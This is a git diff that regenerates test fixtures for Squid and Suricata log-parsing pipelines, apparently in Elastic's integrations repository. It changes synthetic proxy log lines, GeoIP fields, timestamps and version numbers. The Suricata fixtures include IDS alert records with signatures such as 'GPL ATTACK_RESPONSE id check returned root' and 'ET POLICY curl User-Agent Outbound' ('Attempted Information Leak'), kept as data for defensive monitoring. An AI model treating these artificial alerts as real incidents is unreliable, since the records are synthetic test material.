"2021-12-14T14:55:10.058093314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.109.88.27 5568 [02/Feb/2019:8:27:57 cidu] \"PROPATCH https://internal.example.com/oluptate/todi.jpg?tdolo=ident#scip eacommod\" 10.254.10.98 adipisc aparia \"maliq\" ccusant epteurs 6661 \"https://www5.example.org/oditau/onsec.gif?temqui=lup#aeca\" \"Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230448400Z" + "ingested": "2021-12-14T14:55:10.058093672Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.5.148.114 4749 [17/Feb/2019:3:30:32 ntin] \"LOCK https://mail.example.com/radipis/lore.html?civeli=eufugia#utlabore tamr\" 10.175.138.42 olore onemul \"trudexe\" remeum etur 890 \"https://mail.example.org/quiav/ctionofd.gif?Finibus=uisautei#nevolu\" \"Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230451800Z" + "ingested": "2021-12-14T14:55:10.058094039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.0.0.240 1795 [03/Mar/2019:10:33:06 psa] \"PROPFIND https://internal.example.org/olupta/tio.jpg?idestl=litani#emp arch\" 10.18.199.203 ugits ittenb \"tobeatae\" ntut llum 366 \"https://example.com/equat/estiaec.htm?mquido=ende#ntmollit\" \"Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230455100Z" + "ingested": "2021-12-14T14:55:10.058094407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] 
}, { - "ecs": { - "version": "1.12.0" - }, "message": "10.1.220.47 6685 [17/Mar/2019:5:35:40 mipsamv] \"NONE https://www5.example.com/sequines/cto.gif?temaccu=uamqua#Neq runt\" 10.73.80.251 pteurs ercitati \"atem\" serro lumquid 5939 \"https://www5.example.org/imaveni/equ.htm?ssequamn=ave#taliqui\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230458700Z" + "ingested": "2021-12-14T14:55:10.058094769Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.153.109.61 7499 [01/Apr/2019:12:38:14 numq] \"PURGE https://www.example.net/periam/ain.gif?iquipex=mqu#onorume abill\" 10.22.34.206 mini mve \"tionev\" uasiarch velites 1745 \"https://api.example.org/equa/edquiaco.gif?olorsit=naaliq#plica\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" block", "event": { - "ingested": "2021-06-08T12:14:42.230462200Z" + "ingested": "2021-12-14T14:55:10.058095180Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.62.168.226 5334 [15/Apr/2019:7:40:49 bori] \"CONNECT https://www.example.net/ecatc/quovolu.jpg?dexe=nemul#Duis lupt\" 10.199.103.185 uipe ipsa \"con\" eirured sequamn 5243 \"https://mail.example.com/ciatisun/duntutl.htm?didun=riaturEx#nde\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" allow", "event": { - "ingested": 
"2021-06-08T12:14:42.230465600Z" + "ingested": "2021-12-14T14:55:10.058095536Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.97.33.56 3541 [29/Apr/2019:2:43:23 rad] \"COPY https://example.com/tqui/ssequ.gif?emse=emqui#cipitla tlab\" 10.128.84.27 nula ptate \"volupta\" umfu utla 2478 \"https://www5.example.com/dolo/velites.gif?equa=apari#tsunt\" \"Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230469400Z" + "ingested": "2021-12-14T14:55:10.058095903Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.49.169.175 2103 [13/May/2019:9:45:57 sistena] \"HEAD https://example.com/caboN/imipsam.jpg?catcupid=ritquiin#quisnost sequines\" 10.115.154.104 illum ore \"spici\" Sedut tatis 7767 \"https://www5.example.com/sequines/minimve.gif?toditau=uiad#nvolupta\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230472900Z" + "ingested": "2021-12-14T14:55:10.058096280Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.213.100.153 2571 [28/May/2019:4:48:31 iatquo] \"PROPFIND https://www.example.org/oinvento/ali.htm?utaliqui=isciv#osqu ptatemse\" 10.33.112.100 catcup enimad \"magnaali\" velillum ionev 1594 \"https://internal.example.com/ameaq/Quis.html?lestiae=iav#umiure\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" block", "event": { - "ingested": "2021-06-08T12:14:42.230476400Z" + "ingested": 
"2021-12-14T14:55:10.058096642Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.216.143.226 2632 [11/Jun/2019:11:51:06 deomn] \"CONNECT https://api.example.net/quido/llo.htm?tpersp=assi#rch psa\" 10.25.53.93 tvolup oremeu \"lab\" lla urau 6127 \"https://example.net/equamni/atcupi.htm?onemull=mdo#labore\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230480Z" + "ingested": "2021-12-14T14:55:10.058097019Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.139.195.188 893 [25/Jun/2019:6:53:40 aliquaU] \"HEAD https://www.example.net/tvolu/imve.txt?gnaaliq=quam#deriti edictasu\" 10.246.115.57 edquiano mSecti \"henderi\" taevitae tevel 5926 \"https://example.com/ita/iquipexe.jpg?quamqua=quuntur#nihi\" \"Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230483500Z" + "ingested": "2021-12-14T14:55:10.058097384Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.60.56.205 4345 [10/Jul/2019:1:56:14 writtenb] \"NONE https://www5.example.com/ugitsed/dminimve.htm?onse=uiac#tquii tesse\" 10.82.148.126 inBCSedu ita \"ade\" nihilmol nder 2214 \"https://api.example.net/uunturm/iatn.gif?tseddo=diduntut#rroq\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" block", "event": { - "ingested": "2021-06-08T12:14:42.230487100Z" + 
"ingested": "2021-12-14T14:55:10.058097754Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.245.251.98 261 [24/Jul/2019:8:58:48 mremaper] \"DELETE https://api.example.com/ntium/ide.htm?tamrema=isautem#usan gnamali\" 10.6.11.124 edqui tvolu \"psu\" strud onsequ 5930 \"https://www5.example.net/iumto/sequatu.jpg?runtm=mdoloree#que\" \"Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230490500Z" + "ingested": "2021-12-14T14:55:10.058098120Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.99.55.115 1537 [07/Aug/2019:4:01:23 exerci] \"CONNECT https://www5.example.org/iad/ngelits.jpg?mporin=orissusc#utaliqui uov\" 10.145.25.55 litsed lumd \"tiaec\" lorem iamquisn 2079 \"https://mail.example.org/aper/entor.txt?lumdol=edutper#utemve\" \"Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230493900Z" + "ingested": "2021-12-14T14:55:10.058098487Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.187.86.64 3325 [21/Aug/2019:11:03:57 atatn] \"TRACE https://mail.example.com/iatnulap/roi.htm?uine=loreeu#eprehe ddoeiusm\" 10.6.88.105 uptatemU rem \"onorumet\" iscivel rinci 249 \"https://internal.example.com/eriti/uptateve.htm?rema=mcol#tion\" \"Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230497200Z" + "ingested": "2021-12-14T14:55:10.058098848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] 
}, { - "ecs": { - "version": "1.12.0" - }, "message": "10.252.146.132 503 [05/Sep/2019:6:06:31 tat] \"CONNECT https://mail.example.org/turv/use.jpg?mtot=macc#illoin eursi\" 10.163.9.35 uatDu umq \"ipsu\" oremip ota 4562 \"https://example.com/epteurs/itse.jpg?modi=cip#tla\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230500600Z" + "ingested": "2021-12-14T14:55:10.058099212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.249.101.177 4465 [19/Sep/2019:1:09:05 quam] \"DELETE https://mail.example.com/umdol/rerepr.txt?emipsumq=orinr#ineavol umdo\" 10.235.160.245 squamest upta \"umquiad\" porinc uameiu 4857 \"https://api.example.org/mipsa/uas.gif?reeufu=umexe#xce\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230503900Z" + "ingested": "2021-12-14T14:55:10.058099582Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.140.170.171 773 [03/Oct/2019:8:11:40 deom] \"TRACE https://internal.example.com/rautod/onorumet.htm?mvo=agnidol#nevolup erspici\" 10.73.218.58 quidol tinv \"Utenima\" nse umq 1831 \"https://mail.example.org/meaquei/snisiu.htm?atev=vento#litsed\" \"Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230507400Z" + "ingested": "2021-12-14T14:55:10.058099955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"10.248.156.138 2125 [18/Oct/2019:3:14:14 smodit] \"OPTIONS https://example.net/dun/xce.jpg?nsequat=mvol#asiar eiu\" 10.67.148.40 tcons squamest \"ction\" emveleum siuta 2155 \"https://example.com/epteur/onproi.txt?imveniam=sunte#exerc\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230510900Z" + "ingested": "2021-12-14T14:55:10.058100319Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.83.154.75 4260 [01/Nov/2019:10:16:48 explicab] \"UNLOCK https://api.example.com/teiru/mquamei.jpg?pta=uradi#sequu orumetMa\" 10.37.33.179 taed eatae \"siutali\" oloremq sum 6106 \"https://www.example.org/ulamc/doe.txt?remquela=toreve#squirat\" \"Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230514800Z" + "ingested": "2021-12-14T14:55:10.058100704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.14.29.202 7842 [15/Nov/2019:5:19:22 modoco] \"MKOL https://www5.example.net/dtempor/rroquisq.gif?liquid=uidex#umdolo nimv\" 10.84.107.38 tutla usmod \"ine\" qui itse 2097 \"https://www5.example.org/tasn/exeaco.html?metc=aincidu#reprehe\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230518Z" + "ingested": "2021-12-14T14:55:10.058101077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.221.86.133 6682 [30/Nov/2019:12:21:57 edi] 
\"POST https://api.example.com/ore/adeser.htm?pre=aute#rchite rcit\" 10.204.223.184 oinve ptasnul \"utaliqui\" mcorpor rerepr 6861 \"https://example.com/tuserror/agnama.jpg?deritq=boreetdo#teni\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230521500Z" + "ingested": "2021-12-14T14:55:10.058101442Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.195.4.70 3844 [14/Dec/2019:7:24:31 mfugiat] \"PUT https://api.example.com/liqu/dolor.htm?ess=umdo#aer quela\" 10.229.39.190 Nequepo edictas \"emac\" rmagnido exeaco 2574 \"https://api.example.org/loremi/nven.htm?usan=ugiatn#squa\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230525200Z" + "ingested": "2021-12-14T14:55:10.058101803Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/squid/manifest.yml b/packages/squid/manifest.yml index b49cc6654da..44f2025fd97 100644 --- a/packages/squid/manifest.yml +++ b/packages/squid/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: squid title: Squid Logs -version: 0.6.0 +version: 0.6.1 description: Collect and parse logs from Squid devices with Elastic Agent. categories: ["security"] release: experimental diff --git a/packages/suricata/changelog.yml b/packages/suricata/changelog.yml index 98f101aab26..1079985dd4a 100644 --- a/packages/suricata/changelog.yml +++ b/packages/suricata/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json index f4d460235d9..8c53763d6d8 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json @@ -17,19 +17,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -101,7 +96,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.608432300Z", + "ingested": "2021-12-14T14:55:13.385151134Z", "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json index cfc6a2e50d1..9d9fd5d5bf8 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json 
@@ -80,7 +80,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996624600Z", + "ingested": "2021-12-14T14:55:13.788105617Z", "original": "{\"timestamp\":\"2018-10-03T14:42:44.836744+0000\",\"flow_id\":2191386088856669,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32858,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T14:42:44.613469+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -182,7 +182,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996633900Z", + "ingested": "2021-12-14T14:55:13.788108390Z", "original": "{\"timestamp\":\"2018-10-03T16:16:26.711841+0000\",\"flow_id\":678269478904081,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32864,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:16:26.467217+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -284,7 +284,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996640100Z", + "ingested": "2021-12-14T14:55:13.788108878Z", "original": "{\"timestamp\":\"2018-10-03T16:44:50.813100+0000\",\"flow_id\":1170030461115650,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32870,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:44:50.580866+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -386,7 +386,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996646Z", + "ingested": "2021-12-14T14:55:13.788109227Z", "original": "{\"timestamp\":\"2018-10-03T16:45:09.267308+0000\",\"flow_id\":49628113637132,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32872,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:09.036620+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -488,7 +488,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996652100Z", + "ingested": "2021-12-14T14:55:13.788109590Z", "original": "{\"timestamp\":\"2018-10-03T16:45:34.481113+0000\",\"flow_id\":116307482565223,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32876,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:34.252519+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -590,7 +590,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996658Z", + "ingested": "2021-12-14T14:55:13.788109939Z", "original": "{\"timestamp\":\"2018-10-03T17:02:38.900976+0000\",\"flow_id\":1205867738178946,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32892,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T17:02:38.599426+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -691,7 +691,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996663900Z", + "ingested": "2021-12-14T14:55:13.788110292Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.009897+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1138},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":497,\"bytes_toclient\":1654,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
